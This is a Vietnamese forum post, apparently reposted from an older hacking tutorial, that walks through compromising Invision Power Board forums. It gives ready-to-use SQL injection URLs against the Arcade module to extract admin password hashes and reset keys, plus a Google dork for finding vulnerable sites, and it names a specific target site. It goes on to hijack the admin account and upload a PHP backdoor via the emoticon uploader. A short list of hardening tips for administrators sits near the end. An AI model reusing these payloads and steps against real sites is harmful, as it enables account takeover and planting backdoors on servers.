Nói về kỹ thuật upload backdoor lên hosting qua việc hack forum trứớc nhưng vì trứớc đây đã từng post bài rồi! do lão NEO backup thế nào mà mất tiêu mấy bài! hic! nên trong khi viết bài thì nói luôn vậy!
hò! Mấy hôm trước trungthep và dinhcaohack và dondoc... và một số anh em có bàn về lỗi BUG GAME Arcade trong Forum VBB! Rồi ###### dondoc dưa cai link bug : ==>>milw0rm.com/exploits/1296 thấy hay hay! và thấy răng bên VBB thì khó mà lấy được pass của Admin để Login vào ACP! nên quyết định chọn thằng IBP để hack ! và chắc là có thể lấy được pass Login của Admin! để rồi có thể upload backdoor lên hosting ! ok
bây giờ nhìn vào phàn Bug xem nào!:
Quote:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
đây là phần Bug ở phần Game Arcade! nó có 2 loại dành cho cả IBP và VBB! ngoài cái Bug này thì phần Arcade này còn dính một số Bug nũă! nhưng mà khó khai thác và có cái ko thể khai thác được!
ok! vậy thì tìm site dính BUG xem nào : vào Google tìm với từ khóa :
Quote:
allinurl:"index.php?act=Arcade"
Có đến hơn 100 nghàn Site dạng kiểu đó ! thoải mái tìm Site để anh em check và hack! hò!
mình chọn ==>>nubcake.com/index.php?act=Arcade
Thêm cái này sau index.php? act=Arcade&module=report&user=1
và link BUG của nó sẽ là:
hxxp://==>>nubcake.com/index.php?act=Arcade&module=report&user=1Test Bug: Thêm dấu ' vào:
báo lỗi :
Quote:
:
mySQL query error: SELECT name FROM ibf_members WHERE id=1'
mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
mySQL error code:
Date: Tuesday 04th of April 2006 01:07:27 PM
SQL inject roài! muốn biết cách khai thác thì các bạn có thể đọc bài viết về tư duy! kỹ thuật khai thác SQL trong Forum tại đây:
https://www.vniss.net/xforce/showthread.php?t=400còn ta có link khai thác Pass của admin là là: CODE==>>nubcake.com/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20ibf_members%20where%20id=1
hiện ra:
Quote:
Player Details for 8005125c396680661893d36fc0723158
Pass Hash đấy! bạn có thể FAKE IP để vào forum thành Admin ! OK
nhưng mà bây giờ Trungthep sẽ nói đến phương án khác!vì nếu dừng lại ở đó! thì bạn chỉ có mỗi pass Admin ở dạng PASS HASH đã mã hóa MD5 rồi! Như vậy thì chỉ có thể vào Forum! mà ko thể vào ACP đựoc! vậy bây giờ chúng ta sẽ tìm cách để có thể có pass admin ở để Login vào ACP!
đầu tiên là bạn tìm xem nick Admin của nó! xem số Id của nó là bâo nhiêu? thông thường là 1! ok! sau đó vào chọn phần quên mật khẩu!
vào: ==>>nubcake.com/index.php?act=Reg&CODE=10
nhập vào đó tên của admin mà mình muốn lấy Pass! nhập vào : Rob
ok! có trường hợp thì phải nhập Email! mà muốn lấy Email thì dùng luôn câu lệnh Select mà lấy email của admin site đó luôn! dễ thôi mà! ok!
sau đó ! bạn vào quay trở lại link Bug! và sử dụng câu lệnh truy vấn để Select cái Pass mà Server gửi cho admin Rob đó! giải thích về loại pass này thì khi mà mình forgot Pass thì Server sẽ tạo cho Victim 1 cái pass mã hóa (mã hóa theo MD5) và sẽ gửi link đến mail đã đằng ký cho Victim. và khi Run cái đoạn link đó! thì sẽ có 1 link form hiện ra cho phép mình nhập pass mới vào! mà ko cần nhập vào pass cũ!
ok Link của nó có dạng:
Quote:
http /www.XXXXXindex.php?act=Reg&CODE=lostpassform&uid=1 &aid=1b3f179f8e33ddd90a601f7e0f0919c1
sẽ xuất hiện Activation Form
và 1b3f179f8e33ddd90a601f7e0f0919c1 chính là pass để Set pass mới !
và quan trọng là khi mà mình Forgot Pass thì DATBASE sẽ tạo ra một pass mới cho Victim và nó sẽ tạm thời lưu trong table ibf_validating ! và nó nằm trong column password !
ok! bây giờ nếu muốn hiẻu đựoc rõ hơn! thì bạn nên đoc kỹ bài viết về tư duy! kỹ thuật khai thác SQL trong Forum tại đây:
https://www.vniss.net/xforce/showthread.php?t=400 cho thật kỹ thì sẽ hiểu vì sao tôi chỉ Select có mỗi column password trong table ibf_validating thôi! ok!
bây giờ câu lệnh để lấy cái pass được mã hóa Md5 ! dùng cho việc Set lại Pass mới là:
Quote:
%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating% 20v%2cibf_topics%20t%20WHERE%20v.member_id=1
vậy link của nó là:
hxxp://nubcake.com/index.php?act=Arcade&module=report&user=-1%20%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20v%2cibf_topics%20t%20WHERE%20v.member_id=1sẽ thấy :
đó chính là phần pass để Reset Pass mới!
sau đó bạn vào phần sau :
Quote:
http /www.XXXXXindex.php?act=Reg&CODE=lostpassform&uid=1 &aid=1b3f179f8e33ddd90a601f7e0f0919c1
thay phần bôi đó này bằng cái Pass reset mới hack đựoc đó!
ok:
lúc nào thấy xuất hiện Form sau:
thì nhập Pass mới mà bạn muốn sử dụng vào : ví dụ Vniss (nhập 2 cái giống nhau nhé !OK)
sau đó thì đơn giản! chỉ việc Login vào forum! và sau đó bạn vào ACP (cái này nếu mà Forum dùng Pass Sec thì sẽ khó khăn hớn nếu dạng pass Sec mà nằm trong Data thì sử dụng câu lệnh Selec mà tìm ra cái pass Sec đó ! còn nếu dạng pass defaul thì khó khăn đấy! Pass Defaul là dạng Admin Site đó tự mã hóa một cái pass và sau đó paste vào trong Code file admin.php , như thế thì chỉ còn cách hack Local mới biết được pass Sec đó thôi! hiiiii) còn cái này thì không có pass Sec! sướng quá! ok!
vào ==>>nubcake.com/admin.php
Login vào! và sau đó chọn phần Manage Emoticon nhấp chuột vào đó! và chọn phần upload Emoticon! ok!
vì thằng ÌBP không Fix phần upload Emoticon là chỉ có IMAGE nên ta có thể uplaod lên dây 1 file php! và bạn hãy upload lên 1 con backdoor! ok!
link của nó sau khi upload sẽ là: ==>>nubcake.com/html/emoticons/xxx.php
ok! Run lên! là bạn sẽ có 1 backdoor trên hosting rồi đó!
nói thêm về cách upload backdoor trong ACP thì các bạn có thể upload qua XML nữa! cái này làm sao upload đựoc thì các bạn hãy tự nghiên cứu xem sao nhé! nó cũng khá là dễ! hiiiiiii đơn giản lắm! các phiên bản về sau này thì càng có nhiều nới upload backdoor trong ACP! hãy tìm hiểu đi!ok!
Lời khuyên cho các quản trị:
_ Khi làm một Mod Game hay thứ nào đó hãy kiểm tra code trứoc! check xem có bug ko!
_nên xây dựng thêm Pass Sec Login vào ACP để Forum an toàn hơn!
_Chmod thật kỹ các thư mục : UPLOADS ! thư mục EMOTICON !... và các thư mục có khả năng cho upload khác nữa!
_ hạn chế việc cho phép các MEM, User upload file lên hosting!
........
thỉnh thoảng vào các Site bảo mật! hacking... để cập nhật các Infor về lỗi bảo mật và thông tin liên quan!
CODEđoạn này
%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating% 20v%2cibf_topics%20t%20WHERE%20v.member_id=1
có thể chuyển thành
%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20WHERE%20v.member_id=1
cho đơn giản, hash sẽ show ở "total games played by"
Trích dẫn
với IPB 2.0.x vào index.php?showuser=1 để xem Username trc khi ForgotPass
với 2.1.x vào
ngoài ra ở IPB 2.1.x sẽ có display name nên ta phải inject
%20UNION%20SELECT%20name%20FROM%20ibf_members%20WHERE%20id=1
Bài này mình sưu tập trên net,ko nhớ rõ nguồn ...mong bà con thông cảm
Tue Sep 10, 2013 3:38 pm by ngotuong90
